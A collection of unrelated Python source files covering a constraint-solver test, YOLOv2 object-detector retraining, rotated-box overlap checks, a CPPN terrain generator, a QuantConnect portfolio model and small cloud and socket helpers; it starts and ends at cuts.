expect(solver.solve()).to(be_false)
with it('infers a solution despite duplicates'):
# Cathy is CEO (constrain the two values with cardinality of 1).
self.model(self.Cathy == self.CEO)
# CEO is older (constrains CEO to one of the 11 values).
self.model(self.CEO.age > self.Project_Manager.age)
solver = self.model.load('Mistral')
solutions = []
while solver.solve():
solutions.append(str(solver))
solutions = list(sorted(solutions))
expected_solutions = [
"""
name | occupation | age
Andy | Analyst | 11
Bob | Project Manager | 10
Cathy | CEO | 11
""",
"""
name | occupation | age
Andy | Project Manager | 10
Bob | Analyst | 11
Cathy | CEO | 11
""",
]
expect(solutions).to(have_len(len(expected_solutions)))
for solution, expected in zip(solutions, expected_solutions):
expect(solution).to(look_like(expected))
with it('models additional variables'):
# Cathy is CEO (constrain the two values with cardinality of 1).
self.model(self.Cathy == self.CEO)
# CEO is older (constrains CEO to one of the 11 values).
self.model(self.CEO.age > self.Project_Manager.age)
ceo_is_old = variable('ceo_is_old')
self.model(ceo_is_old == (self.CEO == self._11))
expect(str(self.model)).to(look_like("""
assign:
name["Cathy"].occupation["CEO"] in {0,1}
occupation["CEO"].age[10] in {0,1}
occupation["CEO"].age[11] in {0,1}
occupation["Project Manager"].age[10] in {0,1}
occupation["Project Manager"].age[11] in {0,1}
ceo_is_old in {0,1}
subject to:
(name["Cathy"].occupation["CEO"] == True)
((10*occupation["CEO"].age[10] + 11*occupation["CEO"].age[11]) > (10*occupation["Project Manager"].age[10] + 11*occupation["Project Manager"].age[11]))
(occupation["CEO"].age[11] == ceo_is_old)
"""))
|
import cv2
import numpy as np
from DAL_utils.overlaps_cuda.rbbox_overlaps import rbbx_overlaps
from DAL_utils.overlaps.rbox_overlaps import rbox_overlaps
a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
b = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
c = rbbx_overlaps(a, b)
d = rbox_overlaps(a, b)
print(c)
print(d)
# def iou_rotate_calculate(boxes1, boxes2):
# area1 = boxes1[2] * boxes1[3]
# area2 = boxes2[2] * boxes2[3]
# r1 = ((boxes1[0], boxes1[1]), (boxes1[2], boxes1[3]), boxes1[4])
# r2 = ((boxes2[0], boxes2[1]), (boxes2[2], boxes2[3]), boxes2[4])
#
# int_pts = cv2.rotatedRectangleIntersection(r1, r2)[1]
# if int_pts is not None:
# order_pts = cv2.convexHull(int_pts, returnPoints=True)
#
# int_area = cv2.contourArea(order_pts)
#
# inter = int_area * 1.0 / (area1 + area2 - int_area)
# return inter
# else:
# return 0.0
#
# for i in range(100):
# a = np.array([np.random.randn()])
# a = np.array([1, 0.5, 2, 1, 0])
# a = np.array([1, 0.5, 1, 2, 90])
# b = np.array([0.5, 1, 2, 1, -90])
#
# iou = iou_rotate_calculate(a, b)
# print(iou)
# cnt = np.array([[0, 0], [2, 0], [2, 2], [0, 2]])
# cnt = np.array([[0, 2], [2, 0], [3, 1], [1, 3]])
# cnt = np.array([[0, 1], [1, 0], [3, 2], [2, 3]])
#
# rect = cv2.minAreaRect(cnt)
# box = cv2.boxPoints(rect)
# box = np.int0(box)
# print(rect)
# print(box)
# rect = ((1.5, 1.5), (2.8284271, 1.4142135), -45)
# box = cv2.boxPoints(rect)
# print(box)
# a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
# b = np.array([[10, 10, 40, 10, 0]], dtype=np.float32)
# c = rbbx_overlaps(a, b)
# d = rbox_overlaps(a, b)
# print(c)
# print(d)
|
"""
This is a script that can be used to retrain the YOLOv2 model for your own dataset.
"""
import argparse
import os
import sys
import matplotlib.pyplot as plt
import numpy as np
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping
from yad2k.models.keras_yolo import (preprocess_true_boxes, yolo_body,
yolo_eval, yolo_head, yolo_loss)
from yad2k.utils.draw_boxes import draw_boxes
# Args
argparser = argparse.ArgumentParser(
description="Retrain or 'fine-tune' a pretrained YOLOv2 model for your own data.")
argparser.add_argument(
'-d',
'--data_path',
help="path to numpy data file (.npz) containing np.object array 'boxes' and np.uint8 array 'images'",
default=os.path.join('data', 'data_training_set.npz'))
argparser.add_argument(
'-a',
'--anchors_path',
help='path to anchors file, defaults to yolo_anchors.txt',
default=os.path.join('model_data', 'yolo_anchors.txt'))
argparser.add_argument(
'-c',
'--classes_path',
help='path to classes file, defaults to pascal_classes.txt',
default=os.path.join('model_data', 'league_classes.txt'))
YOLO_ANCHORS = np.array(
((0.57273, 0.677385), (1.87446, 2.06253), (3.33843, 5.47434),
(7.88282, 3.52778), (9.77052, 9.16828)))
debug = False
BATCH_SIZE_1 = 32
BATCH_SIZE_2 = 8
EPOCHS_1 = 5
EPOCHS_2 = 30
EPOCHS_3 = 30
if debug:
BATCH_SIZE_1 = 2
BATCH_SIZE_2 = 2
EPOCHS_1 = 1
EPOCHS_2 = 1
EPOCHS_3 = 1
class TrainingData:
    # The dataset is broken up into "clusters": npz files holding 20 games' worth of data.
    # It is not economical to load the entire dataset from a single npz file, since the
    # machine would most likely run out of RAM for such a massive array.
    #
    # all_train_npz_clusters / all_val_npz_clusters are lists of paths to the npz
    # clusters; they are loaded on an as-needed basis (see the usage sketch after
    # this class).
def __init__(self, all_train_npz_clusters, all_val_npz_clusters):
# set up our clusters
self.all_train_npz_clusters = all_train_npz_clusters
self.all_val_npz_clusters = all_val_npz_clusters
# keep track of which training cluster we have loaded
self.curr_train_npz_cluster = np.load(all_train_npz_clusters[0])
self.train_cluster_index = 0
# keep track of which validation cluster we have loaded
self.curr_val_npz_cluster = np.load(all_val_npz_clusters[0])
self.val_cluster_index = 0
# 90% of images are training, 10% are validation.
# images and boxes will simply point to the images of the cluster we are currently on
self.train_images = self.curr_train_npz_cluster['images']
self.train_boxes = self.curr_train_npz_cluster['boxes']
        # set up validation images/boxes as well.
self.val_images = self.curr_val_npz_cluster['images']
self.val_boxes = self.curr_val_npz_cluster['boxes']
# pointers to handle the images within our batch
self.train_batch_pointer = 0
self.val_batch_pointer = 0
def load_train_cluster(self):
# to fix #TODO from below
# left_over_images = []
# for i in range(self.train_batch_pointer, len(self.train_images)):
# left_over_images.append(self.train_images[i])
# print("Leftover...")
# first figure out which cluster we're moving to
# mod length of all_train_npz_clusters keeps us in range
self.train_cluster_index = (self.train_cluster_index + 1) % len(self.all_train_npz_clusters)
# then load it
print("Loading new cluster... ", self.all_train_npz_clusters[self.train_cluster_index])
self.curr_train_npz_cluster = np.load(self.all_train_npz_clusters[self.train_cluster_index])
# then append proper images/boxes
self.train_images = self.curr_train_npz_cluster['images']
self.train_boxes = self.curr_train_npz_cluster['boxes']
# finally, reset training pointer
self.train_batch_pointer = 0
    # do the same thing for the val clusters as done above for the train clusters
def load_val_cluster(self):
self.val_cluster_index = (self.val_cluster_index + 1) % len(self.all_val_npz_clusters)
self.curr_val_npz_cluster = np.load(self.all_val_npz_clusters[self.val_cluster_index])
self.val_images = self.curr_val_npz_cluster['images']
self.val_boxes = self.curr_val_npz_cluster['boxes']
self.val_batch_pointer = 0
def load_train_batch(self, batch_size):
while True:
# print("TBP.. ", self.train_batch_pointer)
# this means we have reached the end of our cluster and need to load another.
            # TODO: this is sort of bad because the leftover frames are wasted.
            # e.g. with batch size 32 and a cluster of 63 images, after the first 32
            # images 32 + 32 > 63, so the remaining 31 images are skipped.
if self.train_batch_pointer + batch_size > len(self.train_images):
self.load_train_cluster()
initial_index = self.train_batch_pointer
end_index = self.train_batch_pointer + batch_size
images_to_process = self.train_images[initial_index:end_index]
boxes_to_process = self.train_boxes[initial_index:end_index]
# print("Boxes to process... ")
# print(boxes_to_process)
# processed
p_images, p_boxes = process_data(images_to_process, boxes_to_process)
detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS)
self.train_batch_pointer += batch_size
yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images))
def load_val_batch(self, batch_size):
while True:
            # fix pointers if they extend too far!
if self.val_batch_pointer + batch_size > len(self.val_images):
self.load_val_cluster()
initial_index = self.val_batch_pointer
end_index = self.val_batch_pointer + batch_size
images_to_process = self.val_images[initial_index:end_index]
boxes_to_process = self.val_boxes[initial_index:end_index]
# processed
p_images, p_boxes = process_data(images_to_process, boxes_to_process)
detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS)
self.val_batch_pointer += batch_size
yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images))
# total number of batches to run for one epoch
def get_train_steps(self, batch_size):
print("Getting train steps...")
steps = 0
for cluster in self.all_train_npz_clusters:
loaded_clust = np.load(cluster)
steps += len(loaded_clust['images'])
print(steps / batch_size)
return int(steps / batch_size)
# total number of batches to run for validation
def get_val_steps(self, batch_size):
print("Getting val steps...")
steps = 0
for cluster in self.all_val_npz_clusters:
loaded_clust = np.load(cluster)
steps += len(loaded_clust['images'])
# return int(len(self.val_images) / batch_size)
print(steps / batch_size)
return int(steps / batch_size)
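# Usage sketch (illustrative; the cluster paths are hypothetical and must point to
# real .npz files containing 'images' and 'boxes' arrays):
#   data = TrainingData(['train/cluster_0.npz'], ['val/cluster_0.npz'])
#   [imgs, boxes, mask, true_boxes], dummy_y = next(data.load_train_batch(32))
# The generators above are handed directly to model.fit_generator() in train().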
def _main(args):
data_path = os.path.expanduser(args.data_path)
classes_path = os.path.expanduser(args.classes_path)
anchors_path = os.path.expanduser(args.anchors_path)
class_names = get_classes(classes_path)
anchors = get_anchors(anchors_path)
# custom data saved as a numpy file.
# data = (np.load(data_path))
# easy class to handle all the data
train_clusts = os.listdir('/media/student/DATA/clusters_cleaned/train/')
val_clusts = os.listdir('/media/student/DATA/clusters_cleaned/val/')
train_clus_clean = []
val_clus_clean = []
for folder_name in train_clusts:
train_clus_clean.append('/media/student/DATA/clusters_cleaned/train/' + folder_name)
for folder_name in val_clusts:
val_clus_clean.append('/media/student/DATA/clusters_cleaned/val/' + folder_name)
data = TrainingData(train_clus_clean, val_clus_clean)
anchors = YOLO_ANCHORS
model_body, model = create_model(anchors, class_names)
train(
model,
class_names,
anchors,
data
)
# here i just pass in the val set of images
images = None
boxes = None
images, boxes = process_data(data.val_images[0:500], data.val_boxes[0:500])
if debug:
images, boxes = process_data(data.val_images[0:10], data.val_boxes[0:10])
draw(model_body,
class_names,
anchors,
images,
image_set='val', # assumes training/validation split is 0.9
weights_name='trained_stage_3_best.h5',
save_all=False)
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
if os.path.isfile(anchors_path):
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
else:
        print("Could not open anchors file, using default.")
return YOLO_ANCHORS
def process_data(images, boxes=None):
'''processes the data'''
images = [PIL.Image.fromarray(i) for i in images]
orig_size = np.array([images[0].width, images[0].height])
orig_size = np.expand_dims(orig_size, axis=0)
# Image preprocessing.
processed_images = [i.resize((416, 416), PIL.Image.BICUBIC) for i in images]
    processed_images = [np.array(image, dtype=np.float32) for image in processed_images]
processed_images = [image/255. for image in processed_images]
if boxes is not None:
# Box preprocessing.
# Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.
boxes = [box.reshape((-1, 5)) for box in boxes]
        # Get extents as y_min, x_min, y_max, x_max, class for comparison with
# model output.
boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]
# Get box parameters as x_center, y_center, box_width, box_height, class.
boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]
boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]
boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]
boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]
boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]
# find the max number of boxes
max_boxes = 0
for boxz in boxes:
if boxz.shape[0] > max_boxes:
max_boxes = boxz.shape[0]
# add zero pad for training
for i, boxz in enumerate(boxes):
if boxz.shape[0] < max_boxes:
zero_padding = np.zeros( (max_boxes-boxz.shape[0], 5), dtype=np.float32)
boxes[i] = np.vstack((boxz, zero_padding))
return np.array(processed_images), np.array(boxes)
else:
return np.array(processed_images)
def get_detector_mask(boxes, anchors):
'''
Precompute detectors_mask and matching_true_boxes for training.
Detectors mask is 1 for each spatial position in the final conv layer and
anchor that should be active for the given boxes and 0 otherwise.
Matching true boxes gives the regression targets for the ground truth box
that caused a detector to be active or 0 otherwise.
'''
detectors_mask = [0 for i in range(len(boxes))]
matching_true_boxes = [0 for i in range(len(boxes))]
for i, box in enumerate(boxes):
detectors_mask[i], matching_true_boxes[i] = preprocess_true_boxes(box, anchors, [416, 416])
return np.array(detectors_mask), np.array(matching_true_boxes)
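# Shape note (from the input shapes declared in create_model below): with 416x416
# inputs and 5 anchors, each detectors_mask[i] is (13, 13, 5, 1) and each
# matching_true_boxes[i] is (13, 13, 5, 5), i.e. one grid cell per 32 input pixels.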
def create_model(anchors, class_names, load_pretrained=True, freeze_body=True):
'''
returns the body of the model and the model
# Params:
load_pretrained: whether or not to load the pretrained model or initialize all weights
freeze_body: whether or not to freeze all weights except for the last layer's
# Returns:
model_body: YOLOv2 with new output layer
model: YOLOv2 with custom loss Lambda layer
'''
detectors_mask_shape = (13, 13, 5, 1)
matching_boxes_shape = (13, 13, 5, 5)
# Create model input layers.
image_input = Input(shape=(416, 416, 3))
boxes_input = Input(shape=(None, 5))
detectors_mask_input = Input(shape=detectors_mask_shape)
matching_boxes_input = Input(shape=matching_boxes_shape)
# Create model body.
yolo_model = yolo_body(image_input, len(anchors), len(class_names))
topless_yolo = Model(yolo_model.input, yolo_model.layers[-2].output)
if load_pretrained:
# Save topless yolo:
topless_yolo_path = os.path.join('model_data', 'yolo_topless.h5')
if not os.path.exists(topless_yolo_path):
print("CREATING TOPLESS WEIGHTS FILE")
yolo_path = os.path.join('model_data', 'yolo.h5')
model_body = load_model(yolo_path)
model_body = Model(model_body.inputs, model_body.layers[-2].output)
model_body.save_weights(topless_yolo_path)
topless_yolo.load_weights(topless_yolo_path)
if freeze_body:
for layer in topless_yolo.layers:
layer.trainable = False
final_layer = Conv2D(len(anchors)*(5+len(class_names)), (1, 1), activation='linear')(topless_yolo.output)
model_body = Model(image_input, final_layer)
# Place model loss on CPU to reduce GPU memory usage.
with tf.device('/cpu:0'):
# TODO: Replace Lambda with custom Keras layer for loss.
model_loss = Lambda(
yolo_loss,
output_shape=(1, ),
name='yolo_loss',
arguments={'anchors': anchors,
'num_classes': len(class_names)})([
model_body.output, boxes_input,
detectors_mask_input, matching_boxes_input
])
model = Model(
[model_body.input, boxes_input, detectors_mask_input,
matching_boxes_input], model_loss)
return model_body, model
def train(model, class_names, anchors, data):
'''
retrain/fine-tune the model
logs training with tensorboard
saves training weights in current directory
best weights according to val_loss is saved as trained_stage_3_best.h5
'''
model.compile(
optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred
}) # This is a hack to use the custom loss function in the last layer.
logging = TensorBoard()
checkpoint = ModelCheckpoint("trained_stage_3_best.h5", monitor='val_loss',
save_weights_only=True, save_best_only=True)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')
print("Training on %d images " % (data.get_train_steps(BATCH_SIZE_1) * BATCH_SIZE_1))
model.fit_generator(data.load_train_batch(BATCH_SIZE_1),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_1),
epochs=EPOCHS_1,
validation_data=data.load_val_batch(BATCH_SIZE_1),
validation_steps=data.get_val_steps(BATCH_SIZE_1),
callbacks=[logging])
model.save_weights('trained_stage_1.h5')
print("Saved!")
model_body, model = create_model(anchors, class_names, load_pretrained=False, freeze_body=False)
model.load_weights('trained_stage_1.h5')
model.compile(
optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred
}) # This is a hack to use the custom loss function in the last layer.
print("Running second....")
model.fit_generator(data.load_train_batch(BATCH_SIZE_2),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_2),
epochs=EPOCHS_2,
validation_data=data.load_val_batch(BATCH_SIZE_2),
validation_steps=data.get_val_steps(BATCH_SIZE_2),
callbacks=[logging])
model.save_weights('trained_stage_2.h5')
# yad2k calls for smaller batches here
model.fit_generator(data.load_train_batch(BATCH_SIZE_2),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_2),
epochs=EPOCHS_3,
validation_data=data.load_val_batch(BATCH_SIZE_2),
validation_steps=data.get_val_steps(BATCH_SIZE_2),
callbacks=[logging, checkpoint, early_stopping])
model.save_weights('trained_stage_3.h5')
def draw(model_body, class_names, anchors, image_data, image_set='val',
weights_name='trained_stage_3_best.h5', out_path="output_images", save_all=True):
'''
Draw bounding boxes on image data
'''
if image_set == 'train':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data[:int(len(image_data)*.9)]])
elif image_set == 'val':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data[int(len(image_data)*.9):]])
elif image_set == 'all':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data])
else:
        raise ValueError("draw argument image_set must be 'train', 'val', or 'all'")
# model.load_weights(weights_name)
print(image_data.shape)
model_body.load_weights(weights_name)
# Create output variables for prediction.
yolo_outputs = yolo_head(model_body.output, anchors, len(class_names))
input_image_shape = K.placeholder(shape=(2, ))
boxes, scores, classes = yolo_eval(
yolo_outputs, input_image_shape, score_threshold=0.07, iou_threshold=0)
# Run prediction on overfit image.
sess = K.get_session() # TODO: Remove dependence on Tensorflow session.
if not os.path.exists(out_path):
os.makedirs(out_path)
for i in range(len(image_data)):
out_boxes, out_scores, out_classes = sess.run(
[boxes, scores, classes],
feed_dict={
model_body.input: image_data[i],
input_image_shape: [image_data.shape[2], image_data.shape[3]],
K.learning_phase(): 0
})
print('Found {} boxes for image.'.format(len(out_boxes)))
print(out_boxes)
# Plot image with predicted boxes.
image_with_boxes = draw_boxes(image_data[i][0], out_boxes, out_classes,
class_names, out_scores)
# Save the image:
if save_all or (len(out_boxes) > 0):
image = PIL.Image.fromarray(image_with_boxes)
image.save(os.path.join(out_path,str(i)+'.png'))
# To display (pauses the program):
# plt.imshow(image_with_boxes, interpolation='nearest')
# plt.show()
if __name__ == '__main__':
args = argparser.parse_args()
_main(args)
|
from permissions import Permissions
from address_descriptor import AddressDescriptor
from bitstring import BitArray
from enum import Enum
TLBRecType = Enum(
"TLBRecType",
"TLBRecType_SmallPage TLBRecType_LargePage TLBRecType_Section TLBRecType_Supersection TLBRecType_MMUDisabled"
)
class TLBRecord(object):
def __init__(self):
self.perms = Permissions()
self.ng = False
self.domain = BitArray(length=4)
self.contiguousbit = False
self.level = 0
self.blocksize = 0
self.addrdesc = AddressDescriptor()
|
# Copyright (c) 2020 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from collections import deque
import json
import neat
from neat.six_util import iteritems, iterkeys
import numpy as np
import pickle
import random
import time
import os
import logging
logger = logging.getLogger(__name__)
class PrettyGenome(neat.DefaultGenome):
def __init__(self, key):
super().__init__(key)
def __str__(self):
connections = [c for c in self.connections.values() if c.enabled]
connections.sort()
s = "Key: {0}\nFitness: {1}\nNodes:".format(self.key, self.fitness)
for k, ng in iteritems(self.nodes):
s += "\n\t{0} {1!s}".format(k, ng)
s += "\nConnections:"
for c in connections:
s += "\n\t" + str(c)
return s
class CppnEnvParams:
x = np.array([(i - 200 / 2.0) / (200 / 2.0) for i in range(200)])
def __init__(self, cppn_config_path='config-cppn', genome_path=None):
self.cppn_config_path = os.path.dirname(__file__) + '/' + cppn_config_path
self.genome_path = genome_path
self.hardcore = False
self.cppn_config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, self.cppn_config_path)
self.cppn_genome = None
self.altitude_fn = lambda x: x
if genome_path is not None:
self.cppn_genome = pickle.load(open(genome_path, 'rb'))
else:
start_cppn_genome = PrettyGenome('0')
start_cppn_genome.configure_new(self.cppn_config.genome_config)
start_cppn_genome.nodes[0].activation = 'identity'
self.cppn_genome = start_cppn_genome
self.reset_altitude_fn()
def reset_altitude_fn(self):
net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config)
self.altitude_fn = net.activate
def get_mutated_params(self):
is_valid = False
while not is_valid:
mutated = copy_genome(self.cppn_genome)
mutated.nodes[0].response = 1.0
mutated.key = datetime.datetime.utcnow().isoformat()
mutated.mutate(self.cppn_config.genome_config)
is_valid = is_genome_valid(mutated) & (self.cppn_genome.distance(mutated, self.cppn_config.genome_config) > 0)
if not is_valid:
continue
net = neat.nn.FeedForwardNetwork.create(mutated, self.cppn_config)
y = np.array([net.activate((xi, )) for xi in self.x])
y -= y[0] # normalize to start at altitude 0
threshold_ = np.abs(np.max(y))
is_valid = (threshold_ > 0)
if not is_valid:
continue
if threshold_ < 0.25:
mutated.nodes[0].response = (np.random.random() / 2 + 0.25) / threshold_
if threshold_ > 16:
mutated.nodes[0].response = (np.random.random() * 4 + 12) / threshold_
res = CppnEnvParams()
res.cppn_genome = mutated
res.reset_altitude_fn()
return res
def save_xy(self, folder='/tmp'):
with open(folder + '/' + self.cppn_genome.key + '_xy.json', 'w') as f:
net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config)
y = np.array([net.activate((xi, )) for xi in self.x])
f.write(json.dumps({'x': self.x.tolist(), 'y': y.tolist()}))
def to_json(self):
return json.dumps({
'cppn_config_path': self.cppn_config_path,
'genome_path': self.genome_path,
})
    def save_genome(self):
        file_path = '/tmp/genome_{}_saved.pickle'.format(time.time())
        with open(file_path, 'wb') as f:
            pickle.dump(self.cppn_genome, f)
def copy_genome(genome):
    file_path = '/tmp/genome_{}.pickle'.format(time.time())
    with open(file_path, 'wb') as f:
        pickle.dump(genome, f)
    with open(file_path, 'rb') as f:
        return pickle.load(f)
def is_genome_valid(g):
graph = {}
for key in g.connections.keys():
if key[0] not in graph:
graph[key[0]] = []
graph[key[0]].append(key[1])
q = deque([-1])
while len(q) > 0:
cur = q.popleft()
if cur == 0:
return True
if cur not in graph:
continue
for node in graph[cur]:
q.append(node)
return False
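# Usage sketch (illustrative; requires the neat-python 'config-cppn' file expected
# by the constructor above):
#   params = CppnEnvParams()
#   heights = [params.altitude_fn((xi,)) for xi in params.x]   # terrain profile
#   harder = params.get_mutated_params()                       # mutated variant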
|
from AlgorithmImports import *  # assumed: QuantConnect LEAN framework (PortfolioConstructionModel, PortfolioTarget, InsightCollection, InsightDirection)
from datetime import datetime, timedelta
import pytz
from collections import defaultdict
from itertools import groupby
class MarketCapWeightedPortfolioConstructionModel(PortfolioConstructionModel):
def __init__(self):
self.marketCapDict = {}
self.removedSymbols = []
self.insightCollection = InsightCollection()
self.nextExpiryTime = datetime.min.replace(tzinfo=pytz.utc)
self.rebalanceFreq = timedelta(30)
self.securities = {}
self.maxWeight = .1
self.minWeight = .01
def CreateTargets(self, algorithm, insights):
targets = []
if not self.ShouldCreateTargets(algorithm.UtcTime, insights):
return targets
self.insightCollection.AddRange(insights)
targets.extend(self.CreateZeroQuantityTargetsForRemovedSecurities())
targets.extend(self.CreateZeroQuantityTargetsForExpiredInsights(algorithm))
lastActiveInsights = self.GetLastActiveInsights(algorithm)
if self.ShouldUpdateTargetPercent(algorithm, lastActiveInsights):
weights = self.DetermineTargetPercent(algorithm, lastActiveInsights)
targets.extend([PortfolioTarget.Percent(algorithm, symbol, weight) for symbol, weight in weights.items()])
self.UpdateNextExpiryTime(algorithm)
return targets
def ShouldCreateTargets(self, time, insights):
return len(insights) > 0 or (time > self.nextExpiryTime)
def CreateZeroQuantityTargetsForRemovedSecurities(self):
if len(self.removedSymbols) == 0:
return []
zeroTargets = [PortfolioTarget(symbol, 0) for symbol in self.removedSymbols]
self.insightCollection.Clear(self.removedSymbols)
self.removedSymbols = []
return zeroTargets
def CreateZeroQuantityTargetsForExpiredInsights(self, algorithm):
zeroTargets = []
expiredInsights = self.insightCollection.RemoveExpiredInsights(algorithm.UtcTime)
if len(expiredInsights) == 0:
return zeroTargets
key = lambda insight: insight.Symbol
for symbol, _ in groupby(sorted(expiredInsights, key=key), key):
if not self.insightCollection.HasActiveInsights(symbol, algorithm.UtcTime):
zeroTargets.append(PortfolioTarget(symbol, 0))
continue
return zeroTargets
def GetLastActiveInsights(self, algorithm):
activeInsights = self.insightCollection.GetActiveInsights(algorithm.UtcTime)
lastActiveInsights = []
groupedInsights = GroupBy(activeInsights, key = lambda insight: (insight.Symbol, insight.SourceModel))
for kvp in groupedInsights:
lastActiveInsights.append(sorted(kvp[1], key=lambda insight: insight.GeneratedTimeUtc)[-1])
return lastActiveInsights
def ShouldUpdateTargetPercent(self, algorithm, lastActiveInsights):
if algorithm.UtcTime > self.nextExpiryTime:
return True
for insight in lastActiveInsights:
if insight.Direction != InsightDirection.Flat and not algorithm.Portfolio[insight.Symbol].Invested:
return True
elif insight.Direction != InsightDirection.Up and algorithm.Portfolio[insight.Symbol].IsLong:
return True
elif insight.Direction != InsightDirection.Down and algorithm.Portfolio[insight.Symbol].IsShort:
return True
else:
continue
return False
def UpdateNextExpiryTime(self, algorithm):
self.nextExpiryTime = self.insightCollection.GetNextExpiryTime()
if self.nextExpiryTime is None:
self.nextExpiryTime = algorithm.UtcTime + self.rebalanceFreq
def DetermineTargetPercent(self, algorithm, lastActiveInsights):
weights = {}
if not lastActiveInsights:
return weights
marketCapBySymbol = {insight.Symbol : algorithm.Securities[insight.Symbol].Fundamentals.MarketCap if insight.Direction == InsightDirection.Up else 0 for insight in lastActiveInsights if insight.Symbol in self.securities}
        aggregatedMarketCap = sum(marketCapBySymbol.values())
        if aggregatedMarketCap == 0:
            # No Up insights with a positive market cap: avoid dividing by zero.
            return weights
        weights = {symbol : min(self.maxWeight, round(mktCap/aggregatedMarketCap, 5)) for symbol, mktCap in marketCapBySymbol.items()}
weights.update({symbol : max(self.minWeight, weight) for symbol, weight in weights.items() if weight > 0})
return weights
def OnSecuritiesChanged(self, algorithm, changes):
for security in changes.RemovedSecurities:
symbol = security.Symbol
self.removedSymbols.append(symbol)
self.securities.pop(symbol, None)
for security in changes.AddedSecurities:
if security.Fundamentals is not None and security.Fundamentals.MarketCap > 0:
self.securities[security.Symbol] = security
def GroupBy(iterable, key=lambda x: x):
d = defaultdict(list)
for item in iterable:
d[key(item)].append(item)
return d.items()
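# Hedged usage note (not part of the original file): in a LEAN/QuantConnect algorithm this
# model is typically attached in Initialize(), e.g.
#   self.SetPortfolioConstruction(MarketCapWeightedPortfolioConstructionModel())
# paired with an alpha model that emits the insights consumed by CreateTargets().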
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import os
from tests.contrib.utils.logging_command_executor import LoggingCommandExecutor
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_GCS_KEY, GcpAuthenticator
SERVICE_EMAIL_FORMAT = "project-%s@storage-transfer-service.iam.gserviceaccount.com"
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "example-project")
TARGET_BUCKET_NAME = os.environ.get("GCP_SPEECH_TEST_BUCKET", "gcp-speech-test-bucket")
class GCPTextToSpeechTestHelper(LoggingCommandExecutor):
def create_target_bucket(self):
self.execute_cmd(["gsutil", "mb", "-p", GCP_PROJECT_ID, "gs://%s/" % TARGET_BUCKET_NAME])
def delete_target_bucket(self):
self.execute_cmd(["gsutil", "rm", "-r", "gs://%s/" % TARGET_BUCKET_NAME], True)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Create and delete bucket for system tests.")
parser.add_argument(
"--action",
dest="action",
required=True,
choices=("create-target-bucket", "delete-target-bucket", "before-tests", "after-tests"),
)
action = parser.parse_args().action
helper = GCPTextToSpeechTestHelper()
gcp_authenticator = GcpAuthenticator(GCP_GCS_KEY)
helper.log.info("Starting action: {}".format(action))
gcp_authenticator.gcp_store_authentication()
try:
gcp_authenticator.gcp_authenticate()
if action == "before-tests":
helper.create_target_bucket()
elif action == "after-tests":
helper.delete_target_bucket()
elif action == "create-target-bucket":
helper.create_target_bucket()
elif action == "delete-target-bucket":
helper.delete_target_bucket()
else:
raise Exception("Unknown action: {}".format(action))
finally:
gcp_authenticator.gcp_restore_authentication()
helper.log.info("Finishing action: {}".format(action))
|
from socketIO_client import SocketIO, BaseNamespace
class Handlers(BaseNamespace):
def on_message_from_server(self, msg):
print("Incoming msg: %s" % msg)
io = SocketIO('localhost', 9090, Handlers, resource="api/v1/socket")
io.emit('hello_from_client')
io.wait(seconds=10)
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
import unittest
from fedora import utils
class TestUtils(unittest.TestCase):
